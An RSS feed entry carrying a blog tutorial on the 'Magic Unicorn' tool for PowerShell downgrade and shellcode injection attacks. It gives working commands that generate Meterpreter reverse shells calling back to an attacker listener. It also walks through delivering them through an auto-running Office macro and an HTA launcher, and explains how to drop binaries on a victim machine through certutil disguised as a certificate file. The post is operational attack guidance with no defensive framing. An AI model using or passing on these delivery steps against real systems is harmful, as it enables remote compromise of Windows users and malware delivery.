<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Macro Attack Archives - Tech Chronicles</title>
	<atom:link href="http://kostacipo.stream/tag/macro-attack/feed/" rel="self" type="application/rss+xml" />
	<link>http://kostacipo.stream/tag/macro-attack/</link>
	<description>Ramblings of a Tech Dude</description>
	<lastBuildDate>Fri, 24 Nov 2023 00:21:44 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.2</generator>

<image>
	<url>https://kostacipo.stream/wp-content/uploads/2019/12/cropped-profile-32x32.jpg</url>
	<title>Macro Attack Archives - Tech Chronicles</title>
	<link>http://kostacipo.stream/tag/macro-attack/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>PowerShell Downgrade Attack – Magic Unicorn</title>
		<link>http://kostacipo.stream/powershell-downgrade-attack-magic-unicorn/</link>
					<comments>http://kostacipo.stream/powershell-downgrade-attack-magic-unicorn/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Fri, 24 Nov 2023 00:21:44 +0000</pubDate>
				<category><![CDATA[Exploitation Tools]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Macro Attack]]></category>
		<category><![CDATA[PowerShell Attack]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2166</guid>

					<description><![CDATA[<p>Introduction Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. This tool is based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18. PowerShell Downgrade Attack: Magic Unicorn Usage is very simple. You just need [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/powershell-downgrade-attack-magic-unicorn/">PowerShell Downgrade Attack – Magic Unicorn</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="row">
<div class="col-lg-12">
<h3>Introduction</h3>
<p>Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. This tool is based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (<a href="https://www.trustedsec.com/" target="_blank" rel="noopener">TrustedSec</a>) and Josh Kelly at <a href="https://www.defcon.org/html/links/dc-archives/dc-18-archive.html" target="_blank" rel="noopener">Defcon 18</a>.</p>
<p><img decoding="async" class="aligncenter wp-image-1467 size-full lazyloaded" src="https://cdn.cyberpunk.rs/wp-content/uploads/2018/08/dc-18-logo-wide.jpg" sizes="(max-width: 350px) 100vw, 350px" srcset="https://cdn.cyberpunk.rs/wp-content/uploads/2018/08/dc-18-logo-wide.jpg 350w, https://cdn.cyberpunk.rs/wp-content/uploads/2018/08/dc-18-logo-wide-300x111.jpg 300w" alt="PowerShell Downgrade Attack Unicorn on Defcon18" width="350" height="129" data-srcset="https://cdn.cyberpunk.rs/wp-content/uploads/2018/08/dc-18-logo-wide.jpg 350w, https://cdn.cyberpunk.rs/wp-content/uploads/2018/08/dc-18-logo-wide-300x111.jpg 300w" data-src="https://cdn.cyberpunk.rs/wp-content/uploads/2018/08/dc-18-logo-wide.jpg" data-sizes="(max-width: 350px) 100vw, 350px" /></p>
<h2>PowerShell Downgrade Attack: Magic Unicorn</h2>
<p>Usage is very simple. You just need to make sure you’ve installed <a href="https://www.cyberpunk.rs/the-most-popular-pentesting-framework-metasploit-framework">Metasploit</a> in the right path and run the Magic Unicorn. Unicorn will automatically generate a powershell command. Copy and paste the powershell code into a command line window or through a payload delivery system:</p>
<pre>root@kali:~/Desktop# python unicorn.py</pre>
<p>Magic Unicorn Supports:</p>
<ul>
<li>Metasploit;</li>
<li>Cobalt Strike;</li>
<li>Your own shellcode;</li>
</ul>
<pre>root@kali:~/Desktop# python unicorn.py
                                                         
                                                         ,/
                                                        //
                                                      ,//
                                          ___   /|   |//
                                      `__/\_ --(/|___/-/
                                   \|\_-\___ __-_`- /-/ \.
                                  |\_-___,-\_____--/_)' ) \
                                   \ -_ /     __ \( `( __`\|
                                   `\__|      |\)\ ) /(/|
           ,._____.,            ',--//-|      \  |  '   /
          /     __. \,          / /,---|       \       /
         / /    _. \  \        `/`_/ _,'        |     |
        |  | ( (  \   |      ,/\'__/'/          |     |
        |  \  \`--, `_/_------______/           \(   )/
        | | \  \_. \,                            \___/\
        | |  \_   \  \                                 \
        \ \    \_ \   \   /                             \
         \ \  \._  \__ \_|       |                       \
          \ \___  \      \       |                        \
           \__ \__ \  \_ |       \                         |
           |  \_____ \  ____      |                        |
           | \  \__ ---' .__\     |        |               |
           \  \__ ---   /   )     |        \              /
            \   \____/ / ()(      \          `---_       /|
             \__________/(,--__    \_________.    |    ./ |
               |     \ \  `---_\--,           \   \_,./   |
               |      \  \_ ` \    /`---_______-\   \\    /
                \      \.___,`|   /              \   \\   \
                 \     |  \_ \|   \              (   |:    |
                  \    \      \    |             /  / |    ;
                   \    \      \    \          ( `_'   \  |
                    \.   \      \.   \          `__/   |  |
                      \   \       \.  \                |  |
                       \   \        \  \               (  )
                        \   |        \  |              |  |
                         |  \         \ \              I  `
                         ( __;        ( _;            ('-_';
                         |___\        \___:            \___:

aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=

                
-------------------- Magic Unicorn Attack Vector -----------------------------

Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates

Happy Magic Unicorns.
</pre>
<p>Magic Unicorn allows native x86 powershell injection attacks on any Windows platform.</p>
<h2>Usage:</h2>
<pre>python unicorn.py payload reverse_ipaddr port</pre>
<h2>Attack Options:</h2>
<ul>
<li>PowerShell Attack Instructions</li>
<li>Macro Attack Instructions</li>
<li>HTA Attack Instructions</li>
<li>Cerutil Attack Instractions</li>
<li>Custom PSI Attack Instructions</li>
</ul>
<h3></h3>
<h3>PowerShell Attack</h3>
<p>After you run the following command it generates two files <code>powershell_attack.txt</code> and <code>unicorn.rc</code>. The text file contains all of the code needed in order to inject the PowerShell attack into memory.</p>
<pre>python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443</pre>
<p>There are plenty scenarios where you can use this attack at. Simply paste the <code>powershell_attack.txt</code> command in any command prompt window and it will give a shell back to you.</p>
<div class="alert alert-info"><strong>Note</strong>: In order to capture the attack, you’ll need to enable the listener.</div>
<p>You can use <code>.rc</code> file with Metasploit to quickly open up listener on the port you’ve specified.</p>
<h3>Macro Attack</h3>
<pre>python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro</pre>
<p>Go to File-&gt;Properties-&gt;Ribbons, and select Developer. Now, you’ll have a developer tab. Create a new macro, call it Auto_Open and paste the generated code into that. This will automatically run.</p>
<div class="alert alert-info">Note: <em>When copying and pasting the excel, if there are additional spaces that are added you need to remove these after each of the powershell code sections under variable “x” or a syntax error will happen!</em></div>
<h3>HTA Attack</h3>
<pre>python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 hta</pre>
<p>The HTA attack will automatically generate two files. <code>index.html</code> tells the browser to use <code>launcher.hta</code> which contains the malicious powershell injection code. All files will be exported to the <code>hta_access/</code> folder. Three main files:</p>
<ul>
<li><code>index.html</code></li>
<li><code>launcher.hta</code></li>
<li><code>unicorn.rc</code></li>
</ul>
<p>To lunch the listener for Metasploit, run:</p>
<pre>msfconsole -r unicorn.rc</pre>
<h3>Cerutil Attack</h3>
<pre>python unicorn.py &lt;path_to_payload/exe_encode&gt; crt</pre>
<p>The Cerutil attack allows you to take a binary file, move it into a base64 format and use certutil on the victim machine to convert it back to a binary for you. It allows you to transfer a binary to the victim machine through a fake certificate file. To get the base64 output, just place an executable in the path of unicorn and run the following:</p>
<pre>python unicorn.py &lt;exe_name&gt; crt</pre>
<p>Files will be stored in <code>decode_attack/</code> folder.</p>
<h3>Custom PSI Attack</h3>
<p>Custom PS1 Examples:</p>
<pre>python unicorn.py harmless.ps1
python unicorn.py myfile.ps1 macro
python unicorn.py muahahaha.ps1 macro 500</pre>
<p>This attack method allows you to convert any PowerShell file (.ps1) into an encoded command or macro.</p>
<h3>Other:</h3>
<ul>
<li>DDE Office COM Attack</li>
<li>Import Cobalt Strike Beacon</li>
<li>Custom Shellcode Generation Method</li>
<li>SettingContent-ms Extension Method</li>
</ul>
<p>For more details and instructions go to <a href="https://github.com/trustedsec/unicorn" target="_blank" rel="noopener">Unicorn GitHub Repository page</a>.</p>
</div>
</div>
<p>The post <a href="http://kostacipo.stream/powershell-downgrade-attack-magic-unicorn/">PowerShell Downgrade Attack – Magic Unicorn</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/powershell-downgrade-attack-magic-unicorn/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
